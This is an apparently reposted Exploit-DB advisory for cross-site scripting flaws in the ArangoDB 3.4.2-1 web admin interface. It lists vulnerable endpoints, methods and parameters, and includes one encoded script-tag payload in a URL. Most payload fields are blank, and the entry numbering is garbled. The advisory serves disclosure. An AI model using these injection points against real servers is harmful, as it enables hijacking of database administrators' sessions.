关键漏洞信息 EDB-ID: 46407 CVE: N/A Author: Ozer Goker Type: WEBAPPS Platform: MULTIPLE Date: 2019-02-18 Vulnerable App: ArangoDB Community Edition 3.4.2-1 漏洞描述 Title: ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting Vendor Homepage: https://www.arangodb.com Software Link: https://www.arangodb.com/download-major/ Version: 3.4.2-1 漏洞详情 Introduction: ArangoDB is a native multi-model, open-source database with flexible data models for documents, graphs, and key-values. Build high performance applications using a convenient SQL-like query language or JavaScript. XSS2 - URL: - http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries - http://127.0.0.1:8529/_db/_system/_api/user/root - METHOD: PATCH - PARAMETER: name - PAYLOAD: XSS3 - URL: - http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries - http://127.0.0.1:8529/_db/_system/_api/user/root - METHOD: Get XSS3 - URL: - http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users - http://127.0.0.1:8529/_db/_system/_api/user - http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E - METHOD: Post - PARAMETER: user, name - PAYLOAD: - - XSS5 - URL: http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users - PAYLOAD: XSS6 - URL: http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases - PAYLOAD: